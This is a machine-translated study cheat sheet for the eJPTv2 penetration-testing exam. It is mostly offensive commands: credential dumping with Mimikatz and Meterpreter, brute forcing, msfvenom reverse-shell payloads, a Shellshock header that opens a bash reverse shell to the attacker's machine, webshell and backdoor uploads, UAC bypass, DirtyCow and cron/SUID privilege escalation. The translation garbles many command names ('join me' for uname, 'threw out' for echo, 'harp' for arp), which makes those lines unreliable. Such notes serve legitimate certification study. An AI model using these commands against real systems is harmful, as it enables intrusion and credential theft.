Translated from Spanish to English - www.onlinedoctranslator.

com

eJPTv2 Exam

Host & Network Auditing (min 80% = 8

right questions)

Transfer files to and from target (2):

ftp(put and get, ? to help) scp

(ssh copy)SCP TUTORIAL
curl(HTTP, HTTPS, SCP, SFTP, FTP)CURL TUTORIAL
python3 -m http.server port
python3 -m SimpleHTTPServer port
wget(to download filesWGET TUTO )
certurilandpowershell(to download filesPowershell + certutil )

List system info in target (2):

Linux:
join me -a(kernel, OS, hostname, processor )
cat /etc/issue(distro + version)
cat /etc/*release(distro + version, codename in parentheses)
send(to view environment variables)
lscpu(info. CPU) free
-h(RAM consumption)
df -h(list of hard drives and mounted drives) df -ht ext4
(only lists ext4 format units) lsblk | grep sd(list disks
and filter by annotation “sd”) dpkg -l(list of packages
installed in debian and their versions)

Meterpreter:
getuid(to see the user)
sysinfo(hostname, OS and Service Pack, architecture, system language and
domain or hostname, distro + release version, kernel and arch) C:\
\Windows\system32\eula.txt(info OS, build number, service pack)
show_mount(to show all active units)
 Windows cmd:
hostname(PC name)
systeminfo(hostname, OS name, OS version, OS manufacturer, OS config,
processor, Win directory, system directory, boot device, keyboard and system
languages, total physical memory (RAM), domain, logon server and
hotfixes/updates, network card, hyper-v) wmic qfe get
Caption,Description,HotFixID,InstalledOn(info. additional
information about hotfixes/updates.Important security
updates regarding privilege escalation )

Compile file information into target (2):

cat, bat, batcat, less, more, type

Collect account information on target (1):

Meterpreter:
getuid(current user or user ID and group ID of the local user)
getprivs(current user privileges)
search logged_on(all the information of users logged in now and
recently and SID)

Linux:
whoami(current user)
groups(to view system groups) groups
xuser(to see xuser groups)
cat /etc/passwd(to see the system accounts, the user accounts at the end
have a console “/bin/sh or /bin/bash”)
last(last users legitimately connected to the system) lastlog(
users who connected to the system [SSH or legitimate])

Windows cmd:
whoami(current user) whoami /
priv(current user privileges)
query user(logged in users) net
users(all user accounts)
net user x(x user info)
 net localgroup(all groups in the system) net
localgroup xgroup(to see the users of x group)

Collect hash/password information from target (1):

You need to have privileges in all:

Meterpreter:
hashdump(Windows: pgrep lsass -> migrate PID lsass -> hashdump)
Kiwi -> help or ?->creds_all(dump all credentials
hasheadas)->lsa_dump_sam(dumps all the users' NTLM
credentials)->lsa_dump_secrets(sometimes dumps creds in plain
text)->password_change(to change the pass or hash from 1
user)

Linux:
cat /etc/shadow(with privileges)
$1$ ->MD5
$2$ ->Blowfish
$5$ ->SHA-256
$6$ ->SHA-512
search hashdump(post/linux/gather/hashdump)
Crack SHA512->john –format=sha512crypt file.txt
– wordlist=/absolutepath
hashcat -m 1800 -a 0 or 3 file.txt /pathwordlist

Windows cmd:
Mimikatz -> help or ?->privilege::debug(if it says 20 OK)->
lsadump::sam(we get syskey;SAMkey;RID[500=admin])->
lsadump::secrets -> sekurlsa::logonpassword(to get pass in
clear text if used and/or available)
Crack NTLM->john –format=NT file.txt –wordlist=/absolutepath
hashcat -m 1000 -a 0 or 3 file.txt /pathwordlist
1st LM and 2nd NTLM

List network information from files in target (1):

 Meterpreter:
ifconfig(IP address + interfaces + MAC + IPv4 + Mask) netstat(list
active TCP/UDP services and their ports + other PCs in
network)

route(routing table, important gateway for pivoting)

arp(hosts connected to the network)

Linux:
ifconfig(network cards, MAC + IP + segment)
ip as(MAC, IP + segment)
cat /etc/networks(interfaces and their configuration)
cat /etc/hosts(hosts + local domains) cat /
etc/resolv.conf(default DNS server)
harp(hosts connected to the network)

Windows cmd:
ipconfig(network adapters, DNS suffix, IPv4 and 6 addresses,
netmask and gateway)
ipconfig /all(hostname, IP routing enabled, MAC Address, DHCP
enabled [dynamic IPs], Lease expires, DHCPserver-gateway, DNS
Server)
route print(routing table)
harp(all devices on the network IP and MAC)
netstat -ano(protocols and ports of the services [0.0.0.0 are from
host])
netsh firewall show state(firewall status)
netsh advfirewall firewall dump(dump config file from firewall) netsh
advfirewall show allprofiles(whether the firewall is active or not)

Assessment Methodologies (min 90% = 9

correct)

Locate endpoints on the network (2):

Endpoints are physical devices that connect and exchange
information with a computer network. Some examples of
 endpoints are mobile devices, desktops,
virtual machines, embedded devices and servers.

Identify vulnerabilities in services (1):

Scan services and versions with nmap
searchsploit(to search for exploits and vulnerabilities)
Nessus, OpenVAS
NATIONAL VULNERABILITIES DATABASE nmap scripts:
locate /usr/share/nmap/scripts | grep service msf:db_autopwn
doing before db_nmap or commandanalyzeand
thenvuln

Identify the OS of a target (1):

nmap -O
rpcclient -U “” -N IPobj -> srvinfo
smb-os-discovery(nmap script)
enum4linux -O IPobj
enum4linux -S IPobj
nc IPobj 22(the SSH service says the OS)

Identify open ports and services of a target (2):

nmap -sS -p- -n -Pn –open IPobj nmap
-sV -p 21,22,etc -n -Pn –open IPobj
metasploit(search portscan or db_nmap)

Extract company information from public sources (1):

There may be this type of information on the website.
robots.txt(hidden folders where there may be something)
Source code(there may be hidden things)
Sitemap.xml/sitemaps.xml(makes it easier for the search engine to index the web)
whois xwebpage(to get information from the website: when you registered,
who is the owner, what hosting company you registered with, CIDR
=networkrange; Orgname= name of the organization) Netcraft.com >
services > internet data mining > internet research tools(combines whois, if
there is SSL or TLS, the web technologies used by the
site, the name of the servers)
 dnsrecon -d xpage.com(identifies the records for a particular
domain; NS = name server addresses; MX = mail service address (the
"mailman"; A=IPv4 address; AAAA=IPv6 address; TXT=txtrecord))
dnsdumpster.com
sublist3r -d xpage.com(search for subdomains with OSINT)

Collect technical information from public sources (1):

There may be this type of information on the website.
whatweb -a=1 xpage.com(lists technologies, stealth scan)
wafw00f xpage.com(you can add option -a)

Collect emails from public sources (1):

There may be this type of information on the website.
theHarvester -d xpage.com -b
google,linkedin,yahoo,dnsdumpster,duckduckgo,crtsh(search
for emails using OSINT, the emails found can be searched in
password databases leaked since many users use the
same password on same sites)
HaveIbeenPwned
Breach Directory (the best)

Evaluate information and criticality or impact of vulnerabilities

(1):
NATIONAL VULNERABILITIES DATABASE
MITER SEARCH CVE LIST
NessuseitherOpenVAS
exploit-dbeithersearchsploit Google
search for “CVE version service”
SCAP scan & STIGVIEWER(scans the PC and automatically evaluates
the vulnerabilities it has)

Host & Network Pentesting (min 70% = 7

correct)

Do hash cracking (2):

hashideitherhash-identifiereitherhash-id.py(to identify hashes)
john(john the ripperJOHN SPANISH MANUAL )
hashcat(HASHCAT LIST HASHES AND EXAMPLES )
crackstation (online hash cracker)

Identify and modify exploits (2):

searchsploit service version(to search for exploits)
searchsploit -m /path/example/46531.py(to download an exploit)
to modify it use nano(modify fields/variables
necessary)
 Do brute-force password attacks (1):
with nmap scripts
with metasploit login modules(p. e.g. smb_login)
hydra(the best tool)-t3to not do DoS.

Exploit with metasploit (1):

you know very well how to do it
service postgresql start && msfconsole

Demonstrate pivoting by adding a route (2):

(2nd notebook)
Meterpreter:
ipconfigeitherifconfig(to see network cards, add it even if only
have one)
run autoroute -s 10.10.10.0/20(example to add the target IP
minus the value that needs to be 0/netmask)
run autoroute -p(to list the routes)

Demonstrate pivoting by doing port forwarding (1):

(2nd notebook)
Meterpreter:
portfwd add -l 1234 -p 80 -r IPobj2(where -l is the port kali is
listening to connect to target 2, and -p is the target port of IP2,
and -r is IPobj2)
then nmap the forwarded port nmap -sV -p 1234 localhost

Web Application Pentesting (min 60% = 5

correct)
Make webapp recognition (3):
Source code(there may be hidden things)
whatweb(to see the technologies used and if it is vulnerable to something)
wafw00f page.com(you can add -a) http IPeitherdomain(to
remove headers from a website) browsh –startup-url http:/
paginaÓip/Default.aspx(makes website enum with the URL that we pass
to it, simulates the page in terminal, Control
+ W to exit)
 browsh –startup-url IPobj(to view the web page in console) curl
IPobj | more(DocType html; title Apache 2 Ubuntu)=wget
“http:IPobj/index” -> cat index | more
curlhttp://IPobj/example | more(useful for viewing access permissions)
lynxhttp://IPobj (to see the source code)
davtest(used to scan, authenticate and exploit a server
WebDAV)
corpse(Allows uploading files, downloading, on-screen display, in-
place editing, moving, copying, creating and deleting collections,
manipulating ownership and locking resources on servers
WebDAV)

Do brute-force login attack (1):

LOGIN FORM (see source code):
hydra -L userwordlist -P passwordlist IPobj http-post-form “/
login.php:login=̂ USER̂ &password=̂ PASŜ &security_level=0&f
orm=submit:Invalid credentials…” -t 3(where /login.php is the page
with the login form; login is the user variable; password is the
password variable; security_level is another form variable
login [may not exist, look at source code], form is the login button
which says submit and :Invalid credentials is the error it throws if
credentials are not correct)
BASIC AUTH [pop-up] (with BurpSuite): (It's in the second notebook
in the end)

Locate hidden files and directories (1):

robots.txt(hidden folders where there may be something)
sublist3r -d page.com(list subdomains)
dirb http://IPoDOMAIN
gobuster dir --url http://IPoDOMAIN/ --wordlist
/usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-
2.3-medium.txt

Identify vulnerabilities in webapps (2):

NIKTO:NIKTO WEB APP VULN SCAN TUTORIAL with WPscan
(wordpress scan):WP SCAN USER DOCUMENTATION
whatweb(to see the technologies used and if it is vulnerable to something)
msf meterpreter:wmap
SQLi(SQL injection) XSS(
cross site scripting) File
inclusion(upload files)
Access to restricted URLs(e.g. forging User-agent, see robots.txt)
Path traversal(/../../../../../../../../../)
Command injection(interpreter reads system commands like
whoami, cat, etc…)
.asp .aspx .php .config file(They are vulnerabilities to be able to upload
a reverse shell)

EXTRA:

DNS Zone Transfer(notebook 1 Topic 1 Point 1.3)

traceroute(follows the path a packet takes from the source

to the destination)

ping(checks if a host is up, it may have ICMP response

off)

arp-scan -I eth0 -g IP/segment(scans network hosts by

passing it a network interface, ignores duplicate packets)

fping -I eth0 -g IP/segment -a 2>/dev/null(ping sweep to hosts

the network, -generate target list and only output active hosts)

SMB enum:

1. NMAP SCRIPTS:

– smb-enum-users script(PC users)

– smb-protocols script(SMB version)

 – smb-security-mode script(user and privileges)

– smb-enum-sessions script(name of the user with an open session)

– smb-enum-shares script(what the service shares)

smb-os-discovery(OS and Samba version, it gives us the name of the
user [computer name] and the NetBIOS computer name)

– script smb-enum-sessions –script-args

smbusername=administrator,smbpassword=passwordadmin IP
(with those arguments we try to open a session if it works)

– script smb-enum-shares –script-args

smbusername=administrator,smbpassword=passwordadmin IP
(to see permissions and shared folders, very useful)

– script smb-enum-users –script-args

smbusername=administrator,smbpassword=passwordadmin IP
(PC users + flags)

smb-server-stats –script-args
smbusername=administrator,smbpassword=passwordadmin IP (to
see how much data has been sent and received, how many logins
have failed, permission errors, system errors, tasks
printer, open files)

smb-enum-domains –script-args
smbusername=administrator,smbpassword=passwordadmin
IP (to view users, password info, complexity requirements, and
all that applies to groups)

smb-enum-groups –script-args
smbusername=administrator,smbpassword=passwordadmin IP
(divides users into different groups)
 smb-enum-services –script-args
smbusername=administrator,smbpassword=passwordadmin IP
(lists the services you use and also specifies)

smb-shares,smb-ls –script-args
smbusername=administrator,smbpassword=passwordadmin IP
(lists the shared contents and what is in those directories [ls])

2.SMB MAP

smbmap -u guest -p “” -d . -H IPobj(where u is samba user, p is

password, d is the directory we are in, and H is the target host)

smbmap -u administrator -p passadmin -d . -H IPobj(to see them

administrator permissions)

smbmap -H IPobj -u administrator -p passadmin -x 'ipconfig'(with

If this command works we can do remote code execution)

smbmap -H IPobj -u administrator -p 'passadmin' -L(this command

runs a list of the contents in the directories
shared)

smbmap -H IPobj -u administrator -p 'passadmin' -r 'C$'(list

contents of 1 specific directory, C in this case)

smbmap -H IPobj -u administrator -p 'passadmin' –upload '/

path/localfile' 'C$\backdoor'(This command is to upload a
file [for example a backdoor] once the backdoor is pasted we run
the above command again and we see that it is pasted)

smbmap -H IPobj -u administrator -p 'passadmin' –download

'C$\flag.txt'(to download specific files to our machine)

3. nmblookup

nmblookup -h
 nmblookup -A IPobj (This shows different groups and what they do.
connections [in <number>], a 20 means that we can connect to the
server)
4. Metasploit enum
SMB 1:use auxiliary/scanner/smb/smb_version (Windows version and
of samba)
SMB2:use auxiliary/scanner/smb/smb2 (to see if it supports SMB2) SMB3:
use auxiliary/scanner/smb/smb_enumshares (enumerate shares and
which are readable and writable, share types, directories, files,
time stamps, etc…)

5. enum4linux

enum4linux -h
enum4linux -S IPobj(list of users, workgroup name, if allowed null
sessions, the domain SID and OS info)

enum4linux -O IPobj(usernames, workgroup name, whether null

sessions are allowed, the domain SID, the OS information);

enum4linux -U IPobj(shows list of PC users);

enum4linux -G IPobj(list of groups [who has different permissions,

can do different things, a user may not have access but be
in 1 group and thus have access])

enum4linux -i IPobj(to see if there are printers and list them)

6. CONNECTION TO SMB

smbclient -h

smbclient -L IPobj -N (using null session, enumerate users

shared, if there is an IPC$ we could connect)
smbclient //IPobj/Public -N(connection to SMB with the user Public which
has write permissions)

smbclient //IP/share -U user (to connect to SMB to a share like

x user [try using the username "Anonymous" without a password])

An RSA ID key (ID_RSA) needs permission 600(chmod +600

archive)

Now we can attempt to ssh into the main server! Before that, check
the id_rsa.pub file to find the username at the end of the file.

ssh user@$ip

Quick troubleshooting:

● Load key “/home/kali/.ssh/id_rsa”: bad permissions :

revisit chmod step
● load pubkey “/home/kali/.ssh/id_rsa”: invalid format :
download/copy thepublickey into . ssh , or generate it with

ssh-keygen -y -f rsa_id > rsa_id.pub

user@IP -i id_rsa

ssh-keygen -y -f rsa_id > rsa_id.pub

 CONNECTING TO RPC

rpcclient -h

rpcclient -U “” -N IPobj (once the session is open, execute the command

? to see command help)

inside rpcclient: srvinfo(it says the OS version);enumdomusers

(shows list of PC users);lookupnames admin(shows SID of
admin in this case)enumdomgroups(shows PC groups)

SSH:

nc IPobj shports(this says the SSH version and the OS)

nmap SSH scripts:

ssh2-enum-algos(This script for SSH 2 tells us what algorithms

can be used to make a password, usually RSA)

ssh-hostkey –script-args ssh_hostkey=full(this gives us the

RSA encrypted SSH host password)

ssh-auth-methods –script-args=”ssh.user=xuser”(to see if there is

weak passwords for xuser in SSH [if they have a password method
authentication or if they have public key (id_rsa) and password])

HTTP:

whatweb IPobj(to see technologies used on the website)

http IPobj(makes a request to the web page and outputs the headers,
here you can list the execution of some vulnerable file)

dirb http://IPobj(directory and subdirectory enumeration)

 browsh –startup-url http://IPobj/Default.aspx(website enumeration with
the URL that we pass to it and simulates the web page)Control + Wfor
go out.

lynx http://IPobj(to see the web page but in text)

curl IPobj | more(Doctype html; title Apache2 Ubuntu)=wget

“http://IPobj/index” -> cat index | more(to see the source code of
the website)

robots.txt(to see disallowed folders and be able to impersonate user-agent

to access them)

curl http://IPobj/cgi-bin | more(error 403 forbidden = useful for later

exploitation)

nmap scripts:

http-enum(shows common but interesting directories)

http-headers(shows the headers of a request to that website and if

is vulnerable to XSS [XSS protection 0]; X-powered-by: asp.net)

http-methods –script-args http.methods.url-path=/directory/

(shows the request types that a web page directory supports)

http-webdav-scan –script-args http.methods.url-path=/webdav/

(this helps identify webdav installations, useful)

SQL(port 1433/3306 TCP)

MySQL:

Connection to MySQL:

mysql -h IPobj -u root(h is host and u is the user with which we

we authenticate)
 it works:

show databases; -> use xdatabase -> select count(*) from xtable;
(shows how many options there are for xtable)->select * from xitem
(to see all of xtabla's xitem)->helpto see options

USEFUL:select load_file(“/etc/shadow”)to see if we get access to the

Linux shadow file

Metasploit:

search mysql_writable_dirs(to view directories with permissions

writing)

search mysql_hashdump(This gives us the user hashes for

then crack them)

nmap scripts:

– script=mysql-empty-password(to see if we can connect

without password)

– script=mysql-info(It tells us the version and some capabilities

We find InteractiveClient which gives us access to the system through
from MySQL)

– script=mysql-users –script-args=”mysqluser='root',mysqlpass=''”
(lists the users of the victim PC)

– script=mysql-databases
– script-args=”mysqluser='root',mysqlpass=''”(lists the bases
server/PC data)

– script=mysql-variables
– script-args=”mysqluser='root',mysqlpass=''”(It takes out the MySQL
variables and in datadir: it tells you where they are stored on the PC)
 – script=mysql-audit
– script-args=”mysql-audit.username='root',mysql-audit.password='
',mysql-audit.filename=/usr/share/nmap/nselib/data/mysql-cis.audit
”(this command audits the MySQL properties [configs], in this
case does not grant privileges to users who are not admin = PASS)

– script=mysql-dump-hashes
– script-args=”mysqluser='root',mysqlpass=''”(show the hashes
of the users of the victim PC)

– script=mysql-query –script-args=”query='select count(*) from

books.authors;',username='root',password=''”(to make
requests to MySQL queries are used)

MSSQL (microsoft SQL):

nmap scripts:

ms-sql-info(service info)

ms-sql-ntlm-info –script-args mssql.instance-port=1433(info of the

authentication protocol)

ms-sq-brute –script-args
userdb=/common_users.txt,passdb=/100-common-passwords.txt
(note the users and passwords taken)

ms-sql-empty-password(info of users who do not have a password)

ms-sql-query –script-args
mssql.username=admin,mssql.password=pass,ms-sql-query.query
=”SELECT * FROM master..syslogins” -oN output.txt(make queries
with user credentials removed)

ms-sql-dump-hashes –script-args
mssql.username=admin,mssql.password=pass(to take out the
PC accounts and their hashes)
 ms-sql-xp-cmdshell –script-args
mssql.username=admin,mssql.password=pass,ms-sql-xp-cmdshell .
cmd='ipconfig'(try remote command execution
remote command)

ms-sql-xp-cmdshell –script-args
mssql.username=admin,mssql.password=pass,ms-sql-xp-cmdshell
. cmd=”type C:\flag.txt”(the same but to read text files
like flags)

Metasploit:

search mssql_login -> configure options -> set verbose false ->
run(this removes users and passwords, bruteforce)

search mssql_enum(to get the information. config. from mssql)

search mysql_enum_sql_logins(remove the logins that exist for mssql)

search mssql_exec(remote command execution)

search mssql_ednum_domain_accounts(lists accounts

domain)

Exploitation:

Windows:
Microsoft IIS + WebDAV: (port 80/443)
Can run .asp .aspx .config and .php files
davtest(used to scan, authenticate and exploit a server
WebDAV)
davtest -url http://IPobj/webdab (it exists but we don't use creds)
davtest -auth user:pass -url http://IPobj/webdav (this tells you that
types of files we can upload and execute)
 corpse(Allows uploading files, downloading, on-screen display, in-
place editing, moving, copying, creating and deleting collections,
manipulating ownership and locking resources on servers
WebDAV)
corpse –help
cadaver http://IPobj/webdav (and enter credentials) in
another terminal:ls -al /usr/share/webshells (asp in this case) then
in cadaver:put /usr/share/webshells/asp/webshell.asp
(configure it if necessary)
We return to the web browser and execute and we obtain the web shell
where we can execute commands.

Microsoft IIS + WebDAV METASPLOIT:

Method 1:
msfvenom -p /windows/meterpreter/reverse_tcp LHOST=IPkali
LPORT=1openport -f asp > shell.asp(we make payload of
reverse shell)
thencadaver http://IPobj/webdavand enter credentials and upload the shell
by msfvenom withput
open metasploitservice postgresql start && msfconsole -> use
multi/handler -> set payload windows/meterpreter/reverse_tcp
(configure it as the msfvenom payload), listen and
on the web page execute the malicious file and we have reverse
shell.
Method 2:
search iis upload -> use 1 -> show optionsand configure it however
necessary->set path /webdav/metasploit.asp -> exploit

Exploiting SMB with PsExec:

To use PsExec we need user credentials, user and

pass or hash

use:psexec.py user@IPobj cmd.exe (like SSH)

 To meterpreter:

search psexec -> use 10(exploit/windows/smb/psexec)->set up

as needed and launch it.

Eternalblue you already know how to exploit it. MS17-010 and CVE-2017-0144

Exploiting RDP:(normally 3389 TCP)

Requires a user account of the target and their pass in text

flat.

throw inmetasploit rdp_scanner(to get the RDP version)

then brute force him to get credentials(if it is with
privileges better)
xfreerdp /u:user /p:password /v:IPobj:RDPport(to connect
via RDP with legitimate credentials to the victim)

BlueKeep: CVE-2019-0708:

METASPLOIT:search bluekeep (use auxiliary to see if it is vulnerable)

thensearch bluekeep -> use 1 (only works on x64)->show options(
configure what is necessary)->show targets(choose suitable)

Exploiting WinRM:(5985 TCP and 5986 HTTPS)

Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

Remote administration protocol that can be used to facilitate the

remote access to Windows OS over HTTPS

Exploitation:

crackmapexecto see all the help

crackmapexec WinRM IPobj -u administrator -p /wordlistpass(to
get privileged user credentials, administrator always exists
on Windows)
 crackmapexec winrm IPobj -u administrator -p pass -x “whoami”
(to test remote command execution)
evil-winrm(.rb) -u administrator -p 'passadmin' -i IPobj(to get
a victim shell)

METASPLOIT:
search winr_script_exec -> use 0 -> show options(and configure)-> set
force_vbs true -> set username and password -> exploit(Can not
work, try several times)

Linux:

Shellshock: (CVE-2014-6271)
The shellshock vulnerability is due to a vulnerability in bash, so
which, bash mistakenly executes commands after a series of characters
(){:;};
Apache servers configured to run .cgi scripts or scripts.sh
They are vulnerable to this attack.
To exploit this vulnerability, a script must be located that allows
communicate with bash.
In the context of an apache web server we can use any script
. cgi accessible from the web server
Shellshock exploitation:
We connect from the web browser to the server's web page
Apache.
We see the source code: in the <script> part we see that it
executes a .cgi file,which is saved in the root folder of the server, it is
accessible,we access the URL of the scripte.g. IPobj/gettime.cgi
We check if it is vulnerable with: nmap -sV IPobj
– script=http-shellshock –script-args
“http-shellshock.uri=/gettime.cgi”is vulnerable
Operation manual:
with burpsuite we intercept the page IPobj/script.cgi -> right click -> send
to repeater -> we replace the user-agent with:(){:;}; threw out; threw out; /bin/
bash -c 'cat /etc/passwd' -> sendand in response it comes out
the response of the executed command
 Reverse shell manual:
nc -nlvp port
We return to burpsuite to the repeater and modify user-agent for this:
(){:;}; threw out; threw out; /bin/bash -c 'bash -i&/dev/tcp/IPkali/LPORTnetcat
0>&1'and we already have the reverse shell
Metasploit:
search shellshock -> use 5
(exploit/multi/http/apache_mod_cgi_bash_env_exec)->show options
-> set targeturi script.cgi -> exploit

extract .tar.gz file -> tar xzf file.tar.gz

Privilege Escalation:

Windows:
Kernel exploit:
after getting meterpreter and not being able to do getsystem:
search suggester(This post exploitation module shows the vulns and
metasploit modules that can be used to elevate privileges)->
select the one you want, configure it and launch it

Manual:
go back to meterpreter -> shell -> sysinfo ->copy info to a file
text->control+c to go back to meterpreter -> open another terminal and
create a text file with nano and paste the previous information We
look for the windows-exploit-suggester folder -> we execute
the python script and add –update ->then
. /windows-exploit-suggester.py –databasethecreatedupdate
–systeminfothe above text file (the exploits that are most
above are more likely to work)
Log back in without meterpreter privileges and go to the Temp folder
-> upload/route/exploit/chosen->shell -> .\exploit.exe 7(where 7 is
the OS version - windows 7)->they give us a new shell with all
the privileges.
 UAC Bypass with UACme:
See UACme github repo to see the technique for the OS
suitable:
We have access to a Windows with a user account from the admins
group. local -> cmd -> net users(the current account is IEUser)->net
localgroup administrators -> when opening cmd as
admin bypasses the UAC.

In meterpreter:
sysinfo(write it down)->pgrep explorer -> migrate PIDexplorer ->
getuid(we are user of the admin group)->getprivs(has few
privileges)->shell -> net user -> net localgroups administrator ->
net user admin password123(access denied = UAC) we go to the
UACme repo on github and download the appropriate version ->
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ipkali
LPORT=availableport -f exe > backdoor.exe We open another
metasploit and use multi/handler(configure it the same as the
msfvenom payload)->run
We return to the admin meterpreter session -> go to Temp and if it is not
in the root folder, create it with mkdir -> upload backdoor.exe ->
upload /root/Desktop/tools/UACME/Akagi64.exe(UAC elected from
repo according to OS)->shell -> dir -> .\Akagi64.exe 23 C:
\Temp\backdoor.exe(and in the multi/handler we should already have
privileged session)

Access token impersonation:

These privileges are required for an attack:
SeAssignPrimaryToken: allows the user to imitate tokens
SeCreateToken:allows the user to create a token with privileges
administrator
SeImpersonatePrivilege:allows the user to create a process under
the security context of another user with administrator privileges,
usually.

Meterpreter incognito module:allows impersonation/imitation of

tokens after successful exploitation, allows listing available tokens
to imitate them.
 Exploitation access token impersonation:
in a Meterpreter -> sysinfo(write it down)->pgrep explorer -> migrate
PIDexplorer -> getuid -> getprivs(has few but has the
SeImpersonatePrivilege)-> load incognito(if dies putpreter do
exploit again)->list_tokens -u(we have delegation tokens, we are
interested in the Administrator account)->copy your token to clipboard ->
impersonate_token “ATTACKDEFENSE\Administrator” -> pgrep
explorer -> migrate PIDexplorer -> getprivs(we already have all)

If there were no tokens, do the potato attack to create token and

impersonate_token “NT AUTHORITY\SYSTEM”

The unattended windows setup utility saves user information and

info. from system config: C:\Windows\Panther\Unattend.xml and
Autounattend.xmlbase64 encrypted passwords

Pass the hash authentication: with psexec module

metasploiteitherwith crackmapexec
metasploit search psexec -> use proper payload meterpreter ->
configure it as needed ->set smbpass plain text or hash
LM:NTLM -> set target Command Native\ upload(the right one)
crackmapexec: crackmapexec smb IPobj -u Administrator -H
“NTLM hash”(Pwned! = good)-x “command”to execute commands

Linux:
Kernel exploit:
We need to know the kernel version
Metasploit Meterpreter + Linux Exploit Suggester: sysinfo
(OS + version + kernel);getuid(we are unprivileged users
[even a service like www-data is worth it])
cd /tmp -> upload ~/Desktop/Linux-Enum/les.sh -> chmod +x les.sh
- > . /les.sh(lists vulns and exploits, also says architecture and
kernel version)->We download DirtyCow fromexploit-db.com
(it is written in C)->mv 40839.c dirty.c(we rename)->gcc
- pthread dirty.c -o dirty -lcrypt (we follow compilation instructions
of the exploit which are within it)->we go back to meterpreter
and upload ~/Downloads/dirty(we upload executable
 compiled)-> /bin/bash -i -> chmod +x dirty -> ./dirty(enter password if I
want)->gives an error because it is not compiled on the machine
aim -> I go back to meterpreter -> shell -> /bin/bash -i ->gcc
- pthread dirty.c -o dirty -lcrypt -> chmod +x dirty -> ./dirty
password123(creates a firefart user who is root and backups /etc/
passwd before creating it; now we have a firefart user with the
password password123)->your firefart(It doesn't work but it's in SSH
too)->ssh firefart@IPobj(do what you ask and then log in)-> Being
root we can do cat /etc/shadowto see the hashes of the
user passwords.

Misconfigured cron jobs:

We have access to a target Linux with unprivileged user

crontab -l(no crontab for student)

ls -alin home there is a file owned by root without permissions, it only has
read and write permissions for root (file=message) cd / -> grep
-rnw /usr -e “home/student/message”(which searches recursively
from the root, in /usr where shells are typically located
scripts where home/student/message appears)->answer:
/usr/local/share/copy.sh:2:cp /home/student/message
/tmp/message
We find a shell script (/usr/local/share/copy.shand the appearance
of“home/student/message”tells us that the file is being
copied to /tmp/message )
list the contents of /tmpls -al /tmp
we have the message file with read permission -> we make cat ls -al /
usr/local/share/copy.sh(the file belongs to root but has
all permissions for everyone)
we make him a cat and we see that he does what is in red and black above
every minute (script runs every minute) In this lab
we don't have nano or vim so:printf '#!/bin/
bash\necho “student ALL=NOPASSWD:ALL” >>
/etc/sudoers' > /usr/local/share/copy.sh sudo -l(user
student may run the following commands: (root)
NOPASSWD: /etc/init.d/cron(before modifying script)
(root) NOPASSWD: ALL(after modifying the script) )
 sudo su(We are already root without asking for authentication)
crontab -l(to see how often the cron job is executed)

Exploiting SUID binaries:

we have access as an unprivileged user

in/home/student -> ls -al(we have 2 binaries, greeting and welcome, the

two are from the root user)greeting only has ryx permissions for root but
welcome has rwsrxrx permissionswhich is the SUID permission and we
allows it to run normally
file welcomeis a standard ELF binary with a shared object (after
from interpreter = shared object)If the shared object does not exist, a malicious
one or one with malicious code that elevates privileges can be created.
In this case the shared object that it has does exist (there is none
missing)
strings welcomewe see the shared object and we see the setuid (that is, it is
a SUID) and we also seewhich invokes the “greetings” binary, which
It's external, but it runs
rm greetings -> cp /bin/bash greetingsnow run bash on it
new greetings file, when I execute the welcome, and I am already root
now we can do cat /etc/shadow and whatever we want

Exploiting a vulnerable program:

we get a meterpreter:
shell -> ps aux(root runs a /bin/check-down binary through a
bash /bin/bash1st the bash appears and then the binary )
cat /bin/checkdown(It is a bash script which through a loop
while executes the chkrootkit program every 60 seconds)
chkrootkit is a program that scans the PC to prevent execution
of a rootkit, in this particular case, is vulnerable to an escalation of
privileges (this vuln only affects versions prior to 0.5.0) to see the
version of the programchkrootkit –help -> chkrootkit -V
Control+C to close the shell channel
background meterpreter session
search chkrootkit -> use -> show options -> chkrootkit session and
path and lhost and lport -> exploit(if it doesn't work put the route
chkrootkit absolute) and we are root
 Web apps vulnerability scan:
with wmap:
In meterpreter:
load wmap -> wmap_TAB(to see commands) wmap_sites
-h(to specify a web page to scan)
wmap_sites -a IPobj(add that page/IP to wmap) wmap_targets
-h(In case we have more targets/URLs, enter the URL of the
page)
wmap_targets -t http://IPobj/setrabajoruta(to put targets)
wmap_run -h(use auxiliaries that are used to search for vulns)
wmap_run -t(take out the auxiliaries we can use and try some
basics like http-version, etc)

with NIKTO:
NIKTO WEB APP VULN SCAN TUTORIAL

with WPscan (wordpress scan):

WP SCAN USER DOCUMENTATION

Cross compiling exploits / cross compiled exploits:

pre-compiled to download and use directly

We select the exploits to compile or cross compile: Exploits

written in C should have information on how to compile them
with mingw if they are configured correctly, if not
information compile it by default

Windows:
x64:
i686-w64-mingw32-gcc exploit.c -o exploit(export to portable
executable)
If it gives an error, after -gcc there are -arguments, tab to see them
x32:
i686-w64-mingw32-gcc exploit.c -o exploit -lws2_32
Linux:
 use gcc tool directly

Reverse shells cheatsheet:

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Meth
odology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

https://www.revshells.com/